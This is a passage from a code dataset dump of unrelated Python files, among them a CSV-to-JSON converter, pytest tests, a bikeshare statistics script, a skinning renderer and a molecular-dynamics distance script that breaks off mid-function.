_buffer)\r\n            dataInfo = OrderedDict(sorted(dataInfo.items(), key=lambda t: t[0]))\r\n            _buffer.insert(0, dataInfo)\r\n            num +=1\r\n            writeJsonfiles(_buffer, _json_title, num, _filename, Car_id, _args_pack_.outdir) #save files by bundle\r\n            _buffer = []\r\n            count = 0\r\n\r\n        #printProgressBar(perCount, data_len)\r\n\r\n    if len(_buffer) != 0:\r\n        # Create a json file from the data remaining in the buffer\r\n        #writeJson(_buffer, _json_title)# make a file\r\n        dataInfo={}\r\n        initDataInfo(dataInfo, _buffer)\r\n        dataInfo = OrderedDict(sorted(dataInfo.items(), key=lambda t: t[0]))\r\n        _buffer.insert(0, dataInfo)\r\n        num +=1\r\n        writeJsonfiles(_buffer, _json_title, num, _filename, Car_id, _args_pack_.outdir) #save files by bundle\r\n\r\ndef field_IndextoStr(_fieldnum, _collist):\r\n    return _collist[_fieldnum]\r\n\r\ndef ts_IndextoStr(_tsnum, _collist):\r\n    return _collist[_tsnum]\r\n\r\ndef carid_IndextoStr(_caridnum, _collist):\r\n    return _collist[_caridnum]\r\n\r\ndef CSVtoDF(_filename, _args_pack_, fieldidx, tsidx, carididx):\r\n    print(\"\\nreading %s\" %_filename)\r\n    if _args_pack_.filetype == 'xlsx' :\r\n        df = pd.read_excel(_filename)\r\n    elif _args_pack_.filetype == 'csv' :\r\n        try:\r\n            chunks = pd.read_csv(_filename, usecols = [fieldidx, tsidx, carididx] ,low_memory=False, chunksize=10000, encoding='utf-8')\r\n        except UnicodeDecodeError:\r\n            try:\r\n                chunks = pd.read_csv(_filename,usecols = [fieldidx, tsidx, carididx], low_memory=False, chunksize=10000, encoding='euc-kr') \r\n            except 
UnicodeDecodeError:\r\n                chunks = pd.read_csv(_filename, usecols = [fieldidx, tsidx, carididx], low_memory=False, chunksize=10000, encoding='cp949')\r\n    \r\n    df = pd.concat(chunks, ignore_index=True)\r\n    #print(df.columns)\r\n\r\n    \r\n    if _args_pack_.filetype == 'xlsx' :\r\n        jsonTitle = (_filename.split('/'))[-1][:-5]+'_'+_args_pack_.field\r\n    elif _args_pack_.filetype == 'csv' :\r\n        jsonTitle = (_filename.split('/'))[-1][:-4]+'_'+_args_pack_.field\r\n    \r\n    print(\"%s -> DF\" %_filename)\r\n\r\n    return df, jsonTitle\r\n\r\ndef pack_to_meta(pack):\r\n    ret = {}\r\n    ret['field']=pack.field\r\n    ret['timestamp']=pack.ts\r\n    ret['carid']=pack.carid\r\n    ret['metric']=pack.metric\r\n    ret['pn']=pack.pn\r\n    ret['cn']=pack.cn\r\n    ret['field']=pack.field\r\n    ret['bundle']=pack.jsonpack\r\n    ret['outdir']=pack.outdir\r\n    return ret\r\n\r\nif __name__ == \"__main__\":\r\n    \r\n    global g_DEBUG\r\n    g_DEBUG = False\r\n\r\n    #gFile_type, bundle = brush_args()\r\n    _args_pack_ = brush_argparse()\r\n    _args_pack_.pn = int(_args_pack_.pn)\r\n    _args_pack_.cn = int(_args_pack_.cn)\r\n    dprint (vars(_args_pack_))\r\n    \r\n    import type_file\r\n    file_type = type_file.file_type\r\n    file_list = file_type['type_'+_args_pack_.filekind]['files']\r\n    col_list = file_type['type_'+_args_pack_.filekind]['columns']\r\n    file_list = [i.encode('utf-8') for i in file_list] # convert unicode strings (u' ~ ') to plain strings\r\n    col_list = [i.encode('utf-8') for i in col_list]\r\n\r\n    fieldidx = int(_args_pack_.field)\r\n    tsidx = int(_args_pack_.ts)\r\n    carididx = int(_args_pack_.carid)\r\n    # Convert the entered index information into the actual column strings\r\n    _args_pack_.field = field_IndextoStr(fieldidx, col_list)\r\n    _args_pack_.ts = ts_IndextoStr(tsidx, col_list)\r\n    _args_pack_.carid = carid_IndextoStr(carididx, col_list)\r\n    #print(_args_pack_.field)\r\n    print('Files to convert')\r\n    for f in file_list:\r\n        print(f)\r\n\r\n    np = _args_pack_.pn\r\n    nc = _args_pack_.cn\r\n\r\n    meta = pack_to_meta(_args_pack_)\r\n    # Create the subprocess manager, producers, and consumers\r\n    workers = pcs.Workers(np, nc)\r\n    works_basket_list = workers.start_work(meta)\r\n\r\n    for file_name in file_list:\r\n        # csv -> df\r\n        df, title = CSVtoDF(file_name, _args_pack_, fieldidx, tsidx, carididx)\r\n        if len(df) == 0:\r\n            continue\r\n        # If df has fewer rows than np, handle it in the main process\r\n        if len(df) < np:\r\n            ToJsonFormat(df, _args_pack_, title, file_name)\r\n        # Otherwise split df into np chunks and send each chunk to a producer queue\r\n        else :\r\n            start=0\r\n            end=start+len(df)/np\r\n            for idx in range(np):\r\n                if idx == np-1:\r\n                    end = len(df)\r\n                while (works_basket_list[idx].full()):\r\n                    time.sleep(0.5)\r\n                works_basket_list[idx].put([df[start:end], title, file_name])\r\n                start = end\r\n                end = start+len(df)/np\r\n    print(\"\\nmain : [csv -> df] done\")\r\n    print(\"All data has been sent to the work baskets\")\r\n    print(\"Subprocesses are still running...\\n\")\r\n\r\n    lines = workers.report()\r\n    totallines=0\r\n    for line in lines:\r\n        totallines += line\r\n    print(\"total processed lines : %d\" %totallines)\r\n","sub_path":"CSV2JSON/CSVJSON_main.py","file_name":"CSVJSON_main.py","file_ext":"py","file_size_in_byte":12040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"589204485","text":"import json\nimport os\n\nfrom utils.baseview import BaseView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom sizer.local_settings import BASE_DIR\n\nclass GetHelpDetails(BaseView):\n\n    def get(self, format=None):\n        \"\"\"\n        To get help page\n        \"\"\"\n        data = self.get_video_details()\n\n        if not data:\n            return Response({'status': 'error',\n
'errorMessage': 'Training videos are missing from webapps/dist/videos folder.'},\n status=status.HTTP_400_BAD_REQUEST)\n\n return Response(data)\n\n def get_video_details(self):\n\n response_data = list()\n\n video_path = os.path.join(BASE_DIR, \"webapps/dist/videos/\")\n if not os.path.isdir(video_path):\n return response_data\n\n video_info_path = os.path.join(BASE_DIR, \"webapps/dist/videos/videos.info\")\n if not os.path.exists(video_info_path):\n return response_data\n\n file_list = [line.rstrip('\\n') for line in open(video_info_path)]\n\n for ifile in file_list:\n ipath = \"webapps/dist/videos/\" + ifile\n fipath = os.path.join(BASE_DIR, ipath)\n if not os.path.exists(fipath):\n continue\n\n with open(fipath, 'r', encoding='utf-8') as f_file:\n info_data=f_file.read()\n info = json.loads(info_data)\n response_data.append(info)\n\n return response_data\n","sub_path":"hyperflexsizer-NewVersions/sizer/sizer/help/helppage.py","file_name":"helppage.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"323544809","text":"import pytest\nfrom dozer.base import PagedResultSet\n\n\n@pytest.fixture\ndef result_set():\n return PagedResultSet(GOOD_RESULT_STRUCT)\n\nGOOD_RESULT_STRUCT = {\n '_items': 'a.b.c.d.e.f.g.h.i.j'.split('.'),\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 10\n },\n '_links': {\n 'last': 'last_url'\n }\n}\n\nRS_MISSING_ITEMS = {\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 20\n },\n '_links': {\n 'next': 'next_url',\n 'last': 'last_url'\n }\n}\n\nRS_MISSING_META = {\n '_items': [],\n '_links': {\n 'next': 'next_url',\n 'last': 'last_url'\n }\n}\n\nRS_MISSING_LINKS = {\n '_items': [], '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 10\n },\n}\n\nRS_FIRST_PAGE = {\n '_items': 'a.b.c.d.e.f.g.h.i.j'.split('.'),\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 20\n },\n '_links': {\n 'next': 'next_url',\n 'last': 'last_url'\n }\n}\n\nRS_NEXT_PAGE = {\n '_items': 'k.l.m.n.o.p.q.r.s.t'.split('.'),\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 10\n },\n '_links': {\n 'last': 'last_url'\n }\n}\n\n\ndef test_paged_result_init():\n PagedResultSet(GOOD_RESULT_STRUCT)\n\n with pytest.raises(NameError) as e:\n PagedResultSet(RS_MISSING_ITEMS)\n assert '_items' in str(e.value), \"_items should be in the error message\"\n\n with pytest.raises(NameError) as e:\n PagedResultSet(RS_MISSING_META)\n assert '_meta' in str(e.value), \"_meta should be in the error message\"\n\n with pytest.raises(NameError) as e:\n PagedResultSet(RS_MISSING_LINKS)\n assert '_links' in str(e.value), \"_links should be in the error message\"\n\n\ndef test_collection_length(result_set):\n # p = PagedResultSet(GOOD_RESULT_STRUCT)\n p = result_set\n assert len(p) == GOOD_RESULT_STRUCT['_meta']['total'],\\\n \"Length should be {}\".format(GOOD_RESULT_STRUCT['_meta']['_total'])\n\n\ndef test_index_access():\n p = PagedResultSet(GOOD_RESULT_STRUCT)\n\n assert p[0] == 'a', 'First element should be \"a\"'\n assert p[2] == 'c', 'Third element should be \"c\"'\n\n\ndef test_set_is_readonly():\n p = PagedResultSet(GOOD_RESULT_STRUCT)\n\n with pytest.raises(NotImplementedError):\n p[0] = 'foo'\n\n\ndef test_iteration():\n p = PagedResultSet(GOOD_RESULT_STRUCT)\n\n count = 0\n for x in p:\n assert x == GOOD_RESULT_STRUCT['_items'][count]\n count += 1\n\n\ndef test_paging(monkeypatch):\n class FakeResp(object):\n json = RS_NEXT_PAGE\n\n def fake_request(*args, **kwargs):\n return 
FakeResp()\n\n    monkeypatch.setattr('requests.sessions.Session.request', fake_request)\n    p = PagedResultSet(RS_FIRST_PAGE)\n    assert len(p.loaded_data) == 1, \"Should initialize only the first page\"\n    p._get_next()\n    assert len(p.loaded_data) == 2, \"after next, there should be one more page\"\n","sub_path":"dozer/tests/test_paged_result.py","file_name":"test_paged_result.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259667587","text":"import time\nimport datetime\n\nfrom bson import objectid\nfrom factories.base import Factory\nfrom models.day import Day\n\nconnection = Factory.connection\nconnection.register([Day])\n\n\nclass DayFactory(Factory):\n    model = 'Day'\n\n    @staticmethod\n    def get_range(user_id, from_ts, to_ts):\n        query = {\n            'user_id': objectid.ObjectId(user_id),\n            'date_ts': {'$gte': int(from_ts), '$lte': int(to_ts)}\n        }\n\n        days = connection.Day.find(query)\n\n        return list(days)\n\n    @staticmethod\n    def get_week(user_id):\n        today = datetime.date.today()\n        yesterday = datetime.date.fromordinal(today.toordinal()-1)\n        seven_days_ago = datetime.date.fromordinal(today.toordinal()-7)\n\n        from_ts = time.mktime(seven_days_ago.timetuple())\n        to_ts = time.mktime(yesterday.timetuple())\n\n        return DayFactory.get_range(user_id, from_ts, to_ts)\n","sub_path":"factories/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"487573809","text":"def BinarySearch(arr,key):\n    high = len(arr) - 1\n    low = 0\n    middle = 0\n    \n    while low <= high: \n        \n        # midpoint must be the average of the bounds, not their sum\n        middle = (high + low) // 2\n        if arr[middle] < key: \n            low = middle + 1\n        elif arr[middle] > key: \n            high = middle - 1\n        else: \n            return middle\n    return -1\nprint(BinarySearch([4,8,15,16,23,42],15))","sub_path":"data_structures_and_algorithms_python/challenges/BinarySearch/array_binary_search.py","file_name":"array_binary_search.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"300317659","text":"\"\"\"\n@author: Vincent Bonnet\n@description : Render Skinning\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import LineCollection\nfrom matplotlib import colors as mcolors\n\ndef draw(mesh, skeleton, weights, displacement, frame_id, render_folder_path = \"\"):\n    '''\n    Drawing function to display the mesh and skeleton\n    '''\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.axis('equal')\n    ax.set_xlim(-16, 16)\n    ax.set_ylim(-16, 16)\n    plt.title('Linear Skinning')\n\n    colors_template = np.asarray([mcolors.to_rgba(c)\n                    for c in plt.rcParams['axes.prop_cycle'].by_key()['color']])\n\n    # Draw mesh (points and edges)\n    x, y = zip(*mesh.vertices)\n    point_colors = np.ones((len(mesh.vertices), 4))\n\n    num_vertices = len(mesh.vertices)\n    num_influences = weights.shape[1]\n    for vertex_id in range(num_vertices):\n        point_color = np.zeros(3)\n\n        for influence_id in range(num_influences):\n            weight = weights[vertex_id, influence_id]\n            point_color += colors_template[influence_id][0:3] * weight\n\n        point_colors[vertex_id][0:3] = point_color\n\n    ax.scatter(x, y, color=point_colors, s=3.0)\n\n    segments = mesh.get_boundary_segments()\n    line_segments = LineCollection(segments,\n                                   linewidths=1.0,\n                                   colors='orange',\n                                   linestyles='-',\n                                   alpha=1.0)\n    ax.add_collection(line_segments)\n\n    # Draw displacement\n    if displacement is 
not None:\n segments = []\n for vertex_id, vertex in enumerate(mesh.vertices):\n segments.append([vertex, vertex+displacement[vertex_id]])\n\n line_segments = LineCollection(segments,\n linewidths=1.0,\n colors='green',\n linestyles='-',\n alpha=1.0)\n\n ax.add_collection(line_segments)\n\n\n\n # Draw skeleton\n segments = skeleton.get_bone_segments()\n line_segments = LineCollection(segments,\n linewidths=3.0,\n colors=colors_template,\n linestyles='-',\n alpha=1.0)\n\n ax.add_collection(line_segments)\n plt.show()\n\n # Export figure into a png file\n if len(render_folder_path) > 0:\n filename = str(frame_id).zfill(4) + \" .png\"\n fig.savefig(render_folder_path + \"/\" + filename)\n","sub_path":"skinning/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"276206683","text":"import time\nimport pandas as pd\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city = input('Enter any one of the following cities (Chicago, New York City, Washington): ').lower()\n while city != 'chicago' and city != 'new york city' and city != 'washington':\n city = input('Enter any one of the following cities (Chicago, New York City, Washington): ').lower()\n\n # TO DO: get user input for month (all, january, february, ... , june)\n month = input('Enter which month you want to filter by (January, February, ... , June, or all): ').lower()\n while month != 'january' and month != 'february' and month != 'march' and month != 'april' and month != 'may' and month != 'june' and month != 'all':\n month = input('Enter which month you want to filter by (January, February, ... , June, or all): ').lower()\n\n # TO DO: get user input for day of week (all, monday, tuesday, ... sunday)\n day = input('Enter which day you want to filter by (Monday, Tuesday, ... , Sunday, or all): ').lower()\n while day != 'monday' and day != 'tuesday' and day != 'wednesday' and day != 'thursday' and day != 'friday' and day != 'saturday' and day != 'sunday' and day!= 'all':\n day = input('Enter which day you want to filter by (Monday, Tuesday, ... , Sunday, or all): ').lower()\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n \n # *** SOURCE FOR THE CODE IN THIS FUNCTION: Based on the Practice Problems (No. 
3) earlier in the lesson for this project ***\n # Load data into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n \n # Convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n \n # Extract the month and day of the week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.day_name()\n \n # Filter the month if applicable\n if month != 'all':\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n # Filter the month to create a new dataframe\n df = df[df['month'] == month]\n \n # Filter the day if applicable\n if day != 'all':\n df = df[df['day_of_week'] == day.title()]\n \n return df\n\ndef start_the_clock():\n # created a function that will calculate the time it takes to calculate\n start_time = time.time()\n rounded_time = round((time.time() - start_time), 1)\n return rounded_time\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # *** SOURCE FOR THE CODE IN THIS FUNCTION: Based on the Practice Problems (No. 1) earlier in the lesson for this project ***\n \n # TO DO: display the most common month\n # Convert the Start Time to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n # Extract month from the Start Time column to create a month column\n df['month'] = df['Start Time'].dt.month\n # Find the most common month\n popular_month = df['month'].mode()[0]\n print('Most common month: {}'.format(popular_month))\n\n # TO DO: display the most common day of week\n # Convert the Start Time to datetime -- already done above\n # Extract day from the Start Time column to create a day column\n df['day_of_week'] = df['Start Time'].dt.day_name()\n # Find the most common day\n popular_day = df['day_of_week'].mode()[0]\n print('Most common day: {}'.format(popular_day))\n\n # TO DO: display the most common start hour\n # Convert the Start Time to datetime -- already done above\n # Extract hour from the Start Time column to create an hour column\n df['hour'] = df['Start Time'].dt.hour\n # Find the most common start hour\n popular_hour = df['hour'].mode()[0]\n print('Most common start hour: {}'.format(popular_hour))\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # TO DO: display most commonly used start station\n popular_start_station = df['Start Station'].mode()[0]\n print('Most common start station: {}'.format(popular_start_station))\n\n # TO DO: display most commonly used end station\n popular_end_station = df['End Station'].mode()[0]\n print('Most common end station: {}'.format(popular_end_station))\n\n # *** SOURCE FOR THE CODE IN THIS FUNCTION: https://stackoverflow.com/questions/53037698/how-can-i-find-the-most-frequent-two-column-combination-in-a-dataframe-in-python (BENY; October 29, 2018) ***\n # TO DO: display most frequent combination of start station and end station trip\n combo_stations = df.groupby(['Start Station','End Station']).size().idxmax()\n print('Most common combination of start station and end station: {}'.format(combo_stations))\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n 
\"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # TO DO: display total travel time\n total_travel_time = df['Trip Duration'].sum()\n print('The total travel time: {}'.format(round(total_travel_time, 1)))\n\n # TO DO: display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n print('The average travel time: {}'.format(round(mean_travel_time, 1)))\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # TO DO: Display counts of user types\n user_types = df['User Type'].value_counts()\n print('Number of user types:\\n{}'.format(user_types))\n print('\\n')\n\n # *** SOURCE FOR THE CODE IN THIS FUNCTION: https://stackoverflow.com/questions/24870306/how-to-check-if-a-column-exists-in-pandas#24870404 (chrisb; July 21, 2014) ***\n # TO DO: Display counts of gender\n if 'Gender' in df.columns:\n gender_types = df['Gender'].value_counts()\n print('Number of gender types:\\n{}'.format(gender_types))\n print('\\n')\n else:\n print('The Gender column does not exist.')\n print('\\n')\n\n # TO DO: Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n # Earliest year of birth\n print('Earliest year of birth: {}'.format(int(df['Birth Year'].min())))\n # Most recent year of birth\n print('Most recent year of birth: {}'.format(int(df['Birth Year'].max())))\n # Most common year of birth\n print('Most common year of birth: {}'.format(int(df['Birth Year'].mode())))\n else:\n print('The Birth Year column does not exist.')\n print('\\n')\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n# *** SOURCE FOR THE CODE IN THIS FUNCTION: Based on code provided by Reviewer from initial submission ***\ndef display_raw_data(df):\n \"\"\" If requested by the user, show the raw data 5 rows at a time \"\"\"\n i = 5\n print('\\n')\n raw = input('Would you like to see the first 5 rows of raw data? ').lower()\n pd.set_option('display.max_columns', 200)\n\n while True: \n if raw == 'no':\n break\n elif raw == 'yes':\n # Display next five rows\n print(df.head(i))\n raw = input(\"Would you like to see the next 5 rows of raw data? \").lower()\n i += 5\n else:\n raw = input(\"\\nYour input is invalid. Please enter only 'yes' or 'no'\\n\").lower()\n \ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n display_raw_data(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n').lower()\n \n while restart != 'yes' and restart != 'no':\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n').lower()\n \n if restart == 'no':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"474314179","text":"\n# -*- coding: utf-8 -*-\nfrom config import db\n\n\nclass ItemContent(db.Model):\n __tablename__ = \"data_item_content\"\n\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n item_id = db.Column(db.Integer)\n is_chapter_title = db.Column(db.SmallInteger)\n chapter_title = db.Column(db.String(200))\n chapter_content = db.Column(db.Text)\n chapter_index = db.Column(db.SmallInteger)\n album_cover = db.Column(db.String(255))\n\n def __init__(self,item_id,is_chapter_title,chapter_title,chapter_content,chapter_index,album_cover):\n '''Constructor'''\n self.item_id=item_id\n self.is_chapter_title=is_chapter_title\n self.chapter_title=chapter_title\n self.chapter_content=chapter_content\n self.chapter_index=chapter_index\n self.album_cover=album_cover\n\n\n def __repr__(self):\n return 'id : %s' % self.id\n\n def updateTable(self,dataDict):\n if dataDict.get(\"id\", None) != None:\n self.id = dataDict.get(\"id\")\n if dataDict.get(\"itemId\", None) != None:\n self.item_id = dataDict.get(\"itemId\")\n if dataDict.get(\"isChapterTitle\", None) != None:\n self.is_chapter_title = dataDict.get(\"isChapterTitle\")\n if dataDict.get(\"chapterTitle\", None) != None:\n self.chapter_title = dataDict.get(\"chapterTitle\")\n if dataDict.get(\"chapterContent\", None) != None:\n self.chapter_content = dataDict.get(\"chapterContent\")\n if dataDict.get(\"chapterIndex\", None) != None:\n self.chapter_index = dataDict.get(\"chapterIndex\")\n if dataDict.get(\"albumCover\", None) != None:\n self.album_cover = dataDict.get(\"albumCover\")\n\n# Client and database attributes dictionary\nclinetHead = {u'id', u'itemId', u'isChapterTitle', u'chapterTitle', u'chapterContent', u'chapterIndex', u'albumCover'}\ntableChangeDic = {\n \"id\":\"id\",\n \"itemId\":\"item_id\",\n \"isChapterTitle\":\"is_chapter_title\",\n \"chapterTitle\":\"chapter_title\",\n \"chapterContent\":\"chapter_content\",\n \"chapterIndex\":\"chapter_index\",\n \"albumCover\":\"album_cover\"\n}\n\nintList = {u'id', u'itemId', u'isChapterTitle', u'chapterIndex'}\n\n# db.create_all()\n","sub_path":"boss_service/models/Data/ItemContent.py","file_name":"ItemContent.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"295704891","text":"#!/usr/bin/env python\n__doc__ = \"\"\"\nScript resizes all images in the folder. 
Parameters which can be specified by the user.\nscale (default = 0.5) <= how much we downscale images e.g 0.5 makes images of 1/4 or area of orig.\nmodify (default = True) <= are images changed in place (origs are overwritten)\npath (default = '.') <= where to look for images (with subdirectories)\n\nRequires: \n* xvfb to not block the screen\n\nPython: \n* requires python-3.2\n\n:bug:\n\tNone known.\n\t\n:organization:\n\tETH\n\"\"\"\n__authors__=\"\"\"Szymon Stoma\"\"\"\n__contact__=\"\"\n__license__=\"Cecill-C\"\n__date__=\"17-11-01\"\n__version__=\"0.1\"\n__docformat__= \"restructuredtext en\"\n\n# ----------------------------------------------------------- imports\n\n\nimport os\nfrom fnmatch import fnmatch\nimport argparse\nimport subprocess\n\n# ----------------------------------------------------------- conf\n\nconf_fiji_args = ['--headless', '-batch'] \n\n# ----------------------------------------------------------- parsing args\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument('--scale', \n\ttype=float,\n\thelp='how much we downscale images e.g 0.5 makes images of 1/4 or area of orig.',\n\tdefault=0.5\n)\nparser.add_argument('--modify', \n\thelp='are images changed in place (origs are overwritten)?',\n\tdefault=True\n)\nparser.add_argument('--path', \n\thelp='where to look for images (with subdirectories)',\n\tdefault='.'\n)\nparser.add_argument('--file_regexp', \n\thelp='what files to include?',\n\tdefault='*'\n)\nparser.add_argument('--fiji_path', \n\thelp='path to executable fiji',\n\tdefault='fiji'\n)\nparser.add_argument('--version', action='version', version='%(prog)s '+str(__version__))\n\nargs = parser.parse_args()\n\n# ----------------------------------------------------------- getting info about files\n\"\"\"\nroot = args.path\npattern = args.file_regexp\n\nto_process = []\nfor path, subdirs, files in os.walk(root):\n\tfor name in files:\n\t\tif fnmatch(name, pattern):\n\t\t\tto_process.append(os.path.join(path, name))\n\"\"\"\n# print(to_process)\n\n# ----------------------------------------------------------- converting files\n\nsubprocess.run([args.fiji_path, *conf_fiji_args]) ","sub_path":"code/util/resize_all_files_in_subdirectories.py","file_name":"resize_all_files_in_subdirectories.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512429973","text":"from collections import Counter,defaultdict,deque\nfrom heapq import heappop,heappush,heapify\nimport sys,bisect,math,itertools,fractions,pprint,time,random\nsys.setrecursionlimit(10**8)\nmod = 10**9+7\nINF = float('inf')\ndef inp(): return int(sys.stdin.readline())\ndef inpl(): return list(map(int, sys.stdin.readline().split()))\n\ndef cal(T):\n res = 0\n last = [0] * 26\n for day in range(D):\n t = T[day]; t -= 1\n last[t] = 0\n res += s[day][t]\n for i in range(26):\n if i == t: continue\n last[i] += 1\n res -= c[i] * last[i]\n return res\ndef check_change(td,tq):\n global score,res\n old_q = res[td]\n res[td] = tq\n now = cal(res)\n if now > score:\n score = now\n else:\n res[td] = old_q\ndef out():\n global res\n for x in res:\n print(x)\n quit()\n\nstart_time = time.time()\nn = 26\nD = inp()\nc = inpl()\ns = []\nmax_s = []\nfor i in range(D):\n tmp = inpl()\n mx = 0; ind = -1\n for j in range(n):\n if tmp[j] > mx:\n mx = tmp[j]\n ind = j\n max_s.append(ind+1)\n s.append(tmp)\n\nlast = [0] * n\nres = [-1] * D\nfor d in range(D):\n ans = -1\n mx = -INF\n for i in range(n):\n now = s[d][i]\n 
for j in range(n):\n if i == j: continue\n now -= s[d][j] * (last[j]+1)\n if now > mx:\n mx = now\n ans = i\n res[d] = ans+1\n for j in range(n):\n last[j] += 1\n if j == ans: last[j] = 0\nscore = cal(res)\n# print(now_score)\n\nwhile True:\n if time.time() - start_time > 1.3: break\n td,tq = random.randrange(0,D), random.randrange(1,n+1)\n check_change(td,tq)\n\nfor x in itertools.combinations(range(D), 2):\n if time.time() - start_time > 1.83: out()\n old = []\n if sum(x^y for x,y in zip(res,max_s)) == 0: continue\n for i in range(2):\n old.append(res[x[i]])\n res[x[i]] = max_s[x[i]]\n now = cal(res)\n if now > score:\n score = now\n else:\n for i in range(2):\n res[x[i]] = old[i]\n","sub_path":"Python_codes/p02618/s452351483.py","file_name":"s452351483.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"481591257","text":"import numpy as np\nimport mdtraj as md\nimport argparse\nimport sys\nimport os\n\nimport MD_init\n\n\ndef getAllCalphaInverseDistances(traj, startID=-1,endID=-1,compr=False):\n\tprint('Compute all C_alpha inverse distances.')\n\tn_frames = int(traj.n_frames)\n\tn_residues = int(traj.n_residues)\n\tprint('n_residues: '+str(n_residues))\n\tall_inds = []\n\n\tif startID == -1: \n\t\t# Construct the distance matrices (n_frames-residue-residue) with the distance \n\t\t# between residues defined as the minimum distance between C_alphas of the two residues.\n\t\t# Do atom selections, save list with all heavy atoms.\n\t\tfor i in range(0,n_residues):\n\t\t\t# Use resid so that multichains can be analyzed also.\n\t\t\tquery = \"protein and name CA and resid \" + str(i)\n\t\t\ttmp_ind = traj.topology.select(query)\n\t\t\tall_inds.append(tmp_ind)\n\t\n\telse:\n\t\t# Construct the distance matrices (n_frames-residue-residue) with the distance \n\t\t# between residues defined as the minimum distance between C_alphas of the two residues.\n\n\t\t# Do atom selections, save list with all heavy atoms.\n\t\tfor i in range(startID,endID+1):\n\t\t\tquery = \"protein and name CA and residue \" + str(i)\n\t\t\ttmp_ind = traj.topology.select(query)\n\t\t\tall_inds.append(tmp_ind)\n\t\n\tn_residues = int(len(all_inds))\t\n\tprint(n_residues*(n_residues-1.0)/2.0)\n\tif compr:\n\t\tdistance_matrices = np.zeros((n_frames,int(n_residues*(n_residues-1.0)/2.0)))\n\telse:\n\t\tdistance_matrices = np.zeros((n_frames,n_residues,n_residues))\n\t\n\tcounter = 0\n\t# Compute distance matrix\n\tfor i in range(0,n_residues):\n\t\tprint(str(i+1)+'/'+str(n_residues))\n\t\tfor j in range(i+1,n_residues):\n\n\t\t\t# Get all atom pairs\t\t\t\n\t\t\tatom_pairs = np.zeros((1,2))\n\t\t\tif 